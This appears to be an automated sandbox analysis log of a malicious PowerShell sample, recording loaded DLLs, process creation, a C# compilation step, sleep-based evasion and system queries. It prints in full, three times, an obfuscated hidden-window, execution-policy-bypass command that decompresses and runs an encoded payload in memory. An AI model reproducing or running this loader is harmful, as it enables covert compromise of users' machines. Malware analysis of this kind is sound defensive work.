Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbR] source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbt\ source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbc~ source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbA source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdb source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbl source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdbhP source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9BAD8167 push ebx; ret 0_2_00007FFD9BAD816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC4845 pushad ; retf 4_2_00007FFD9BAC4849
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC476C push ebp; iretd 4_2_00007FFD9BAC477A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC6695 pushfd ; iretd 4_2_00007FFD9BAC66AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC469C push ecx; iretd 4_2_00007FFD9BAC46AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC46AC push ebx; iretd 4_2_00007FFD9BAC46DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC460C push ecx; iretd 4_2_00007FFD9BAC460D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC4645 push ecx; iretd 4_2_00007FFD9BAC4646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC4585 push ecx; iretd 4_2_00007FFD9BAC45DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC45CC push ecx; iretd 4_2_00007FFD9BAC45DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC28F2 push ebp; retf 4_2_00007FFD9BAC290A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC2925 push edi; retf 4_2_00007FFD9BAC294A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC28BC push ebx; retf 4_2_00007FFD9BAC28EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BAC28AC push eax; retf 4_2_00007FFD9BAC28BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BB90D6C push eax; ret 4_2_00007FFD9BB90D6D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3255
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4243
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4230
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1456
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812 Thread sleep count: 4230 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812 Thread sleep count: 1456 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep time: -1844674407370954s >= -30000s
Source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((new-object system.io.streamreader(new-object system.io.compression.gzipstream((new-object system.io.memorystream(,[system.convert]::frombase64string((('h4siaancgwcca5vvxw/jnhb8{2}6{2}ygg'+'ojitl'+'huefxdzbdxv2ucjdegae0etamhkbw'+'srqadekqtph4v5euqa/hcdrtgy1xl8ph7cy5ka{1}zurtwo5rbhc4zz1ey6d33wd7bhselfmhn4ov8b2{1}gbre7nx6hk7sdhtj8pmyvk8mfgj/hghbcjaozg8kp1xyimkrajmui5hz'+'hxmxy8c5indvb{2}xy1xbxcoljflh2u8{1}lvdbvw7{2}puqfw8zijerlzuzphhako5k+lv4ce5evzsrbynpkasdlugl8bkzgvhr/dxmiiqjv{2}awc8da/wh+vnczp2odfbzyrk8'+'1wyfkjt5mu'+'7s+4o41vljhtfocsvwnz5jdn7+0/e8og1vxi3rfy6jvkkxnbwxy7g2fq+qrlgx2b/hvuetko3hhbvotsxfip5m/el{2}0fbncn5grsmp5mmv/dhuw6/dq+ttrifd'+'obivnre2s8sxs7klv1wnyuec0vff6hdtmqc12dv0kbuqnzus1qmhxz8oftzsgifpwa1f38oaapgezpmgk2kw{1}wxyrc6owb8ozzpqfjd{1}zueupc6i6a06zfyyptotmztw7wgtiilzug+4phv1pz0uwintu82ujtp5zub0ngvcvzpjkfho+7z88dzce6lr'+'zhu4nbrcgokcycw5/ejincbx15gt/zexe/bvrgxlrspenvw6rm5bfulybldifnratg+nekb4unbfwjx{2}qr2zdwoctk7whwmd{2}ykr653kh5ygwiscp3kmpjyla4lua6lkp{1}mm3wiusynci/2egbkx{2'+'}8i70stb7mxlmgw3fg/j{2}opcohgwy66l6nbu+ujirt+n0vr0bjcw0snijwls8px+rvwsz1jduba0nct{1}yevz1lrzlw33hacndetq3vahwy0uvvylj/mig6vt2mqrrd4nyr5rqc0y5xig{1}v66rtren6rzwhkshmemw{1}h7caycyxgk6zxtd7nbq+v7l4xvupdcso2vvoytiu016qh00pxhue6ufhwcphpvtd'+'uarphh+4zbfepv4kopp57bc3wtzkbcbw+ea6grliluwkdwmknhxp6x+t{2}ivno4ihnqli76eu5akk0jeqbsuk2hs4pfoqzlogecq{1}qjtx'+'hcdj{2}sq217xw'+'b+x/5tyf7tsv3dhvm1nvozf3rz3ip+4pene8klrr+fsh3r66lrmpboso1c1xev/7xobk74p'+'nb+svoxsh3frkgiaaa{0}')-f'=','q','9')))),[system.io.compression.compressionmode]::decompress))).readtoend()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid